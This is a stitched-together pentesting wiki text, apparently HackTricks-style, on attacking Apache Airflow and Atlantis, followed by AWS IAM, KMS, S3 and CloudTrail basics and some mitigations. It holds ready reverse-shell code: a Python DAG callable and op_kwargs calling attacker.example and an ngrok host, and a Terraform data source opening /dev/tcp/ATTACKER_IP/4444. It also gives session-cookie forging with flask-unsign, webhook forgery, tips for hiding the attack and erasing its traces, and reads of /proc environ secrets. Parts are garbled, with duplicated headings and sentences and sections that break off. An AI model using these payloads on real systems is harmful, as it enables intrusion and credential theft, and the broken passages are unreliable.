You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete Apache Airflow docker environment. (If you are on MacOS make sure to give at least 6GB of RAM to the docker VM).
## Minikube

One easy way to **run Apache Airflow** is to run it **with minikube**:
```bash
helm install airflow-release airflow-stable/airflow
helm delete airflow-release
```
# Airflow Configuration

Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:

{% content-ref url="airflow-configuration.md" %}
[airflow-configuration.md](airflow-configuration.md)
{% endcontent-ref %}
# Airflow RBAC

Before starting to attack Airflow you should understand **how permissions work**:

{% content-ref url="airflow-rbac.md" %}
[airflow-rbac.md](airflow-rbac.md)
{% endcontent-ref %}
# Attacks

## Web Console Enumeration

If you have **access to the web console** you might be able to access some or all of the following information:

* List **users & roles**
* **Code of each DAG** (which might contain interesting info)
## Privilege Escalation

If the **`expose_config`** configuration is set to **True**, users with the **User role and upwards** can **read the config in the web**. This config contains the **`secret_key`**, which means any user that obtains it can **create their own signed cookie to impersonate any other user account**.

```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
## DAG Backdoor (RCE in Airflow worker)

If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
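Such a backdoor DAG boils down to a `PythonOperator` whose callable dials back to you; a sketch of that callable (it assumes a Linux worker with `/bin/sh`, and the operator wiring in the comment is illustrative):

```python
import socket
import subprocess

def rev_shell(rhost, rport):
    """Connect back to a listener and attach /bin/sh's stdio to the socket."""
    s = socket.create_connection((rhost, rport))
    subprocess.run(["/bin/sh"], stdin=s.fileno(),
                   stdout=s.fileno(), stderr=s.fileno())
    s.close()

# Inside the DAG this would be wired up roughly as:
#   PythonOperator(task_id="task", python_callable=rev_shell,
#                  op_kwargs={"rhost": "attacker.example", "rport": 4444})
```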
## DAG Backdoor (RCE in Airflow scheduler)

If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** a couple of seconds after it is placed inside the DAG's folder.

```python
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
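The reason top-level code runs is simply that the scheduler imports every file in the DAG folder; an Airflow-free demonstration of that import-time execution (the env var stands in for a real payload):

```python
import importlib.util
import os
import tempfile

# A "DAG file" whose top-level code runs the moment it is imported
dag_source = 'import os\nos.environ["SCHEDULER_RCE_DEMO"] = "ran-at-import"\n'

with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
    f.write(dag_source)
    path = f.name

# The scheduler does essentially this to every file in the dags/ folder
spec = importlib.util.spec_from_file_location("evil_dag", path)
spec.loader.exec_module(importlib.util.module_from_spec(spec))
os.unlink(path)

print(os.environ["SCHEDULER_RCE_DEMO"])  # → ran-at-import
```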
## DAG Creation

If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAG scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.

# Configuration File

**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
If you have **access to some machine inside the airflow env**, check the **environment variables**.

Some interesting values to check when reading the config file:
## \[api]

* **`access_control_allow_headers`**: This indicates the **allowed headers** for **CORS**
* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
* You can also **create your own authentication** method with python.
* **`google_key_path`:** Path to the **GCP service account key**
## **\[atlas]**

* **`password`**: Atlas password
* **`username`**: Atlas username

## \[celery]

* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
* **`result_backend`**: Postgres url which may contain **credentials**.
* **`ssl_cert`**: Path to the cert
* **`ssl_key`**: Path to the key
## \[core]

* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don't contain the strings `DAG` and `airflow`.
* **`fernet_key`**: Key to store encrypted variables (symmetric)
* **`hide_sensitive_var_conn_fields`**: Enabled by default, hides sensitive info of connections.
* **`security`**: What security module to use (for example kerberos)
## \[dask]

* **`tls_ca`**: Path to the CA
* **`tls_cert`**: Path to the cert
* **`tls_key`**: Path to the TLS key

## \[kerberos]

* **`ccache`**: Path to ccache file
* **`forwardable`**: Enabled by default

## \[logging]

* **`google_key_path`**: Path to GCP JSON creds.

## \[secrets]

* **`backend`**: Full class name of secrets backend to enable
* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of the secrets backend class.

## \[smtp]

* **`smtp_password`**: SMTP password
* **`smtp_user`**: SMTP user
## \[webserver]

* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
* **`cookie_secure`**: Set **secure flag** on the session cookie
* **`web_server_ssl_key`**: **Path** to the **SSL Key**
* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
## Web Authentication

By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as

# RBAC

Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users can **configure/alter the permissions of other roles**, but it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to them.
Note that **admin** users can **create more roles** with more **granular permissions**.

Also note that the only default role with **permission to list users and roles is Admin; not even Op** is going to be able to do that.

## Default Permissions

These are the default permissions per default role:

# Basic Information

Atlantis basically helps you run Terraform from Pull Requests from your git server.
![](<../.gitbook/assets/image (307) (3).png>)
# Local Lab

1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
   1. You can access the web page in 127.0.0.1:4141
# Atlantis Access

## Git Server Credentials

**Atlantis** supports several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).
{% hint style="warning" %}
In any case, from an attacker's perspective, the **Atlantis account** is going to be a very **interesting one to compromise**.
{% endhint %}
## Webhooks

Atlantis optionally uses [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
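The validation itself is plain HMAC over the raw request body; a receiver-side sketch in the GitHub `X-Hub-Signature-256` style (the secret and body below are invented for the example):

```python
import hashlib
import hmac

def valid_webhook(secret, body, signature_header):
    """Check a GitHub-style 'sha256=<hexdigest>' webhook signature."""
    expected = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_header)

secret = b"atlantis-webhook-secret"
body = b'{"action": "opened"}'
header = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()
print(valid_webhook(secret, body, header))  # → True
```

Without a secret configured, anyone who can reach the endpoint can forge webhook events, which is why this check matters.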
{% hint style="warning" %}
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attacker's perspective it would be interesting to know **if you can send it messages**.
{% endhint %}
## Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>

Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.

{% hint style="warning" %}
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
{% endhint %}
## Web Page

By default Atlantis will run a **web page on port 4141 on localhost**. This page just allows you to enable/disable atlantis apply, check the plan status of the repos, and unlock them (it doesn't allow you to modify things, so it isn't that useful).

You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if any are, `atlantis`:`atlantis` are the **default** ones).
# Server Configuration

Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.

{% hint style="warning" %}
Note that in the configuration you might find interesting values such as **tokens and passwords**.
{% endhint %}
## Repos Configuration

Some configurations affect **how the repos are managed**. However, it's possible that **each repo requires different settings**, so there are ways to specify each repo. This is the priority order:
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) policies.

You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
# Atlantis Commands

[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
```bash
atlantis help

# Run terraform plan
atlantis plan [options] -- [terraform plan flags]
#Options:
# -d directory
# -p project
# --verbose
# You can also add extra terraform options

# Run terraform apply
atlantis apply [options] -- [terraform apply flags]
#Options:
# -d directory
# -p project
# -w workspace
# --auto-merge-disabled
# --verbose
# You can also add extra terraform options
```
# Attacks

{% hint style="warning" %}
If during the exploitation you find this **error**: `Error: Error acquiring the state lock`, you can disable locking:

```bash
atlantis plan -- -lock=false
```
{% endhint %}
#### Atlantis plan RCE - Config modification in new PR ## Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell](https://github.com/carlospolop/terraform_external_module_rev_shell).
* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
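As a minimal sketch of what such a module can contain (the attacker IP/port are placeholders, and this is not the literal code of the repo above), an `external` data source executes its program already at `plan` time:

```terraform
# Hypothetical sketch: "external" data sources run their program during
# `terraform plan`, so a PR pulling this module executes code on the
# Atlantis server. ATTACKER_IP and port 4444 are placeholders.
data "external" "rev_shell" {
  program = ["/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"]
}
```

Note that the plan will error out afterwards (the program returns no JSON), but by then the shell has already spawned.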
## Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
Follow the **suggestions from the previous technique** to perform this attack in a **stealthier way**.
## Terraform Param Injection
When running `atlantis plan` or `atlantis apply`, terraform is run underneath, so you can pass extra arguments to terraform from Atlantis by commenting something like:
```bash
atlantis apply -- -h #Get terraform apply help
```
One thing you can pass is env variables, which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
## Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** the one from `master`.\
This possibility was mentioned in a previous section:
{% endhint %}
## PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
This is the **setting** in GitHub branch protections:
![](<../.gitbook/assets/image (375) (1).png>)
## Webhook Secret
If you manage to **steal the webhook secret** used, or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke Atlantis commands** directly.
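If the secret is stolen, forging a request is just an HMAC computation. A sketch (host, secret and payload are made up) of building the `X-Hub-Signature-256` header GitHub would send:

```bash
# Sketch: sign a forged GitHub issue_comment webhook for the Atlantis
# /events endpoint. Secret, host and payload are placeholders.
SECRET='stolen_webhook_secret'
BODY='{"action":"created","comment":{"body":"atlantis plan"}}'

# GitHub signs the raw body with HMAC-SHA256 and sends it as
# "X-Hub-Signature-256: sha256=<hexdigest>"
SIG=$(printf '%s' "$BODY" | openssl dgst -sha256 -hmac "$SECRET" | awk '{print $NF}')
echo "X-Hub-Signature-256: sha256=$SIG"

# Then deliver it, e.g.:
# curl -X POST http://atlantis.example.com/events \
#   -H 'Content-Type: application/json' \
#   -H 'X-GitHub-Event: issue_comment' \
#   -H "X-Hub-Signature-256: sha256=$SIG" \
#   -d "$BODY"
```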
## Bitbucket

Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
# Post-Exploitation

If you managed to get access to the server, or at least got an LFI, there are some interesting things you should try to read:
* `/proc/1/environ` Env variables
* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
# Mitigations

## Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>

Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
## Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>

If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
## `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>

Atlantis requires you to specify an allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
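A sketch of the flag (the organization wildcard below is a placeholder):

```bash
# "myorg" is a placeholder for your own GitHub organization
atlantis server --repo-allowlist='github.com/myorg/*'
```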
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
## Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>

If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
To prevent this, you could:
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
## Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>

Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
## SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>

If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
## Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>

It is highly recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` flag and set up a username and a password using the `--web-username=yourUsername` and `--web-password=yourPassword` flags.

You can also pass these as environment variables: `ATLANTIS_WEB_BASIC_AUTH=true`, `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
# References

* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
</details>
# Types of services

## Container services
Services that fall under container services have the following characteristics:
* Also, platform-level identity and access management where it exists.
* **Examples** of AWS container services include Relational Database Service, Elastic MapReduce, and Elastic Beanstalk.
## Abstract Services

* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
* The services are accessed via endpoints using AWS application programming interfaces, APIs.
* **Data is isolated via security mechanisms**.
* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
# IAM - Identity and Access Management

IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
## Users

This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
### CLI

* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
**MFA** is **supported** when using the AWS **CLI**.
## Groups

These are objects that **contain multiple users**. Permissions can be assigned to a user or inherited from a group. **Granting permissions to groups and not to users is the secure way to manage permissions**.
## Roles

Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when, for example, an EC2 instance has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.

An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
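As a sketch of the pair (the S3 permissions below are an arbitrary example), a trust policy letting EC2 assume the role:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "Service": "ec2.amazonaws.com" },
    "Action": "sts:AssumeRole"
  }]
}
```

and a permissions policy defining what the role can do:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": "*"
  }]
}
```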
### AWS Security Token Service (STS)

This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
## Policies

### Policy Permissions

They are used to assign permissions. There are 2 types:
### Inline Policies

This kind of policy is **directly assigned** to a user, group or role. It then doesn't appear in the Policies list, so no other identity can use it.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
### S3 Bucket Policies

Can only be applied to S3 Buckets. They contain an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. **Principals define who/what should be allowed or denied access to various S3 resources.**
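A sketch of such a policy (account ID, user and bucket names are made up), granting a single IAM user read access to a bucket:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "AllowSingleUserRead",
    "Effect": "Allow",
    "Principal": { "AWS": "arn:aws:iam::123456789012:user/reader" },
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::examplebucket/*"
  }]
}
```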
## Multi-Factor Authentication

It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. You can use apps like Google Authenticator for free to activate MFA in AWS.
## Identity Federation

Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
An example of an identity provider can be your own corporate Microsoft Active Directory (via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
AWS Identity Federation connects via IAM roles.
### Cross Account Trusts and Roles

**A user** (trusting) can create a Cross Account Role with some policies and then **allow another user** (trusted) to **access his account**, but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offer two options: providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
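In the trust policy this means pointing the principal at the exact user ARN instead of the whole account (the IDs and names below are made up):

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "AWS": "arn:aws:iam::111122223333:user/alice" },
    "Action": "sts:AssumeRole"
  }]
}
```

With the generic `"AWS": "arn:aws:iam::111122223333:root"` instead, any principal in that account allowed to call `sts:AssumeRole` (including federated users) could use the trust.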
### AWS Simple AD

Not supported:
* Schema Extensions
* No Direct access to OS or Instances
### Web Federation or OpenID Authentication

The app uses AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
## Other IAM options

* You can **set a password policy**, with options like minimum length and password requirements.
* You can **download a "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
# KMS - Key Management Service

AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control** _**customer master keys**_ **(CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs).
**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with a data key and then encrypt the data key with a master key**.
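A toy sketch of the two tiers using `openssl` (passphrase-based encryption stands in for the CMK; real KMS uses HSM-backed key material, and every name here is illustrative):

```bash
# Toy envelope-encryption sketch; the "master key" passphrase stands in
# for a KMS CMK.
MASTER_KEY='cmk-stand-in-passphrase'

# 1. Generate a fresh data encryption key (DEK)
DEK=$(openssl rand -hex 32)

# 2. Encrypt the data with the DEK
printf 'top secret payload' |
  openssl enc -aes-256-cbc -pbkdf2 -pass "pass:$DEK" -out data.enc

# 3. Encrypt the DEK with the master key; store dek.enc next to data.enc
printf '%s' "$DEK" |
  openssl enc -aes-256-cbc -pbkdf2 -pass "pass:$MASTER_KEY" -out dek.enc

# Decryption walks the hierarchy backwards: recover the DEK first...
PLAIN_DEK=$(openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:$MASTER_KEY" -in dek.enc)
# ...then use it to decrypt the data
openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:$PLAIN_DEK" -in data.enc
```

Only `dek.enc` needs to be re-encrypted when the master key rotates; the bulk data stays untouched.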
## Key Policies

These define **who can use and access a key in KMS**. By default, the root user has full access over KMS; if you delete this access, you need to contact AWS for support.
Access:
* Via IAM policy
* Via grants
## Key Administrators

Key administrators by default:
* Only IAM users and roles can be added to the Key Administrators list (not groups)
* If an external CMK is used, Key Administrators have the permission to import key material
## Rotation of CMKs

* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, the wider the blast radius of data at risk. In addition to this, the longer the key is active, the higher the probability of it being breached.
* **KMS rotates customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years**, and this time cannot be changed.
* In a breach, rotating the key won't remove the threat, as it will still be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
* If a **CMK** is in a state of **disabled** or **pending deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or the deletion is cancelled.
### Manual rotation

* A **new CMK needs to be created**; then a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
* To make this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
You can import keys from your on-premises key infrastructure.
## Other information

KMS is priced per number of encryption/decryption requests received from all services per month.
You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across regions.
# S3

Amazon S3 is a service that allows you to **store large amounts of data**.
Amazon S3 provides multiple options to achieve the **protection** of data at rest.
With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
## S3 Access logs

It's possible to **enable S3 access logging** (which by default is disabled) for a bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one saving the logs) need to be in the same region.
### S3 Encryption Mechanisms ## S3 Encryption Mechanisms
**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. **DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
* S3 sends the encrypted data and DEK
* As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
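The client-side decryption flow above can be sketched as a toy script. This is purely illustrative: XOR stands in for a real symmetric cipher (in practice the AWS SDK performs envelope encryption with AES, and the CMK may live in KMS rather than on the client):

```python
import os

def xor(data: bytes, key: bytes) -> bytes:
    # Toy stand-in for a real symmetric cipher (e.g. AES-GCM)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# The client holds the CMK (master key); it never leaves the client
cmk = os.urandom(32)

# 1. A fresh DEK is generated and the object data is encrypted with it
dek = os.urandom(32)
plaintext = b"secret object contents"
ciphertext = xor(plaintext, dek)

# 2. The DEK is wrapped (encrypted) with the CMK; S3 stores ciphertext + wrapped DEK
wrapped_dek = xor(dek, cmk)

# 3. On retrieval the client unwraps the DEK with its CMK, then decrypts the data
recovered_dek = xor(wrapped_dek, cmk)
recovered = xor(ciphertext, recovered_dek)
assert recovered == plaintext
```

The point is the key hierarchy, not the cipher: the data key is disposable per object, while the master key only ever encrypts other keys.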
# HSM - Hardware Security Module

Cloud HSM is a FIPS 140 level-two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions, and which one you pick is really based on your exact needs; one is for FIPS 140-2 compliance, and there is a newer version that can also be used.
**With CloudHSM only you have access to the keys** and, without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.

## CloudHSM Suggestions

1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on-premises or in another region at AWS.
2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.

# Amazon Athena

Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.

# AWS CloudTrail

This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3), so AWS will decrypt the content for the people that have access to it, but for additional security you can use SSE with KMS and your own keys.

## Log File Naming Convention

![](<../.gitbook/assets/image (429).png>)

## S3 folder structure

![](<../.gitbook/assets/image (428).png>)
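Per the AWS documentation, delivered log files follow a pattern along the lines of `AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_UniqueString.json.gz`. A sketch of a parser for that assumed pattern (the exact field shapes here are assumptions):

```python
import re

# Assumed CloudTrail log file name pattern:
# AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_UniqueString.json.gz
LOG_NAME_RE = re.compile(
    r"^(?P<account>\d{12})_CloudTrail_"
    r"(?P<region>[a-z0-9-]+)_"
    r"(?P<timestamp>\d{8}T\d{4}Z)_"
    r"(?P<unique>[A-Za-z0-9]+)\.json\.gz$"
)

def parse_log_name(name: str) -> dict:
    """Split a CloudTrail log file name into its components."""
    m = LOG_NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a CloudTrail log file name: {name}")
    return m.groupdict()

info = parse_log_name(
    "111122223333_CloudTrail_us-east-1_20220501T1200Z_Mu0KsOhtH1ar15ZZ.json.gz"
)
print(info["account"], info["region"], info["timestamp"])
```

Parsing the names like this is handy when triaging a bucket full of logs by account, region or time window.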
![](<../.gitbook/assets/image (437).png>)
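The prefix under which CloudTrail delivers files to the bucket can be reproduced with a small helper. The `AWSLogs` and `CloudTrail` folder names are fixed; the optional custom prefix is something you configure per trail:

```python
from datetime import date

def cloudtrail_prefix(account_id: str, region: str, day: date,
                      base_prefix: str = "") -> str:
    """Build the S3 key prefix CloudTrail uses for a given account/region/day.
    "AWSLogs" and "CloudTrail" are fixed folder names in the hierarchy."""
    parts = [base_prefix] if base_prefix else []
    parts += ["AWSLogs", account_id, "CloudTrail", region,
              f"{day.year:04d}", f"{day.month:02d}", f"{day.day:02d}"]
    return "/".join(parts) + "/"

print(cloudtrail_prefix("111122223333", "us-east-1", date(2022, 5, 1)))
# AWSLogs/111122223333/CloudTrail/us-east-1/2022/05/01/
```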
## Aggregate Logs from Multiple Accounts

* Create a Trail in the AWS account where you want the log files to be delivered to
* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into CloudWatch Logs belonging to a single AWS account.

## Log Files Checking

You can check that the logs haven't been altered by running:

```
aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
```
## Logs to CloudWatch

**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed.**\
